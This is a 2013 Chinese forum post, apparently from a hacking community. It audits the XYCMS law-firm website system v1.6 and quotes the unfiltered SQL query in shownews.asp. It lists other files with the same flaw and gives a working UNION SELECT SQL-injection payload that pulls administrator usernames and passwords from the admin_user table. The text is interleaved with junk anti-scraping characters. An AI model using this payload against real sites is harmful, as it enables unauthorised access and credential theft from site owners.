前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
( w/ u% }( ^& [/ y( X
- h( i9 v8 h; m/ K) u& F. d淫荡分割线; Y0 H. ?" D. ?) |0 K; ^1 a
--------------------------------------------------------
! V+ r8 }3 B' W7 Z 0 ]" t. Y% v/ Y9 L0 l* M
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
( ]; O3 H0 @: V3 K7 V( o' i" N源码地址:http://down.chinaz.com/soft/29233.htm# f3 D* W# e6 S0 z5 G3 e- {. A
! h, E9 P- c6 p- Y; j' v漏洞文件:shownews.asp
5 A9 N7 H( {% ]) l( m漏洞代码:7-13行
2 Q0 {) s, {* s) }5 G- } 3 ]. o/ J8 r/ C! n
, S! h2 B# m/ S9 W: Q1 D# y: P
<% ! @- S5 F0 z7 [6 }. }
id=request.QueryString("id")
, w1 z5 Q3 [. v5 i 8 K+ e% d8 K8 l; g ]7 S# W
set snews=server.createobject("adodb.recordset") : p8 s- G( U1 v+ w
exec="select * from [news] where id="&id
2 G$ U4 X7 ^& {) Jsnews.open exec,conn,1,1
8 S- y; X9 u4 `" F$ Y%>. a& d. d9 a! h8 a) \0 K
$ S: ~* J, K: v4 }% d1 S
@6 Z7 l2 ~4 A! @" G
什么过滤都没有 直造成注入
: l* s: Q$ j+ e+ m% ~
% Y2 {$ U' \* i7 B! C注入点:http://127.0.0.1:99/shownews.asp?id=xx( c& w* b( B8 s" N3 k. S
1 [7 k, i0 v$ }' n8 I6 T0 |其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
H$ b: L9 V9 H% O
8 I" r \7 m9 @( ]& C
5 A- K& ]) z1 fexp: union select 1,admin,password,4,5,7 from admin_user
, z! K# T$ z5 h$ x
5 B' K. {" o- ?& m) M! _0 Z |
发表于 2013-4-4 17:28:12
收藏
支持
反对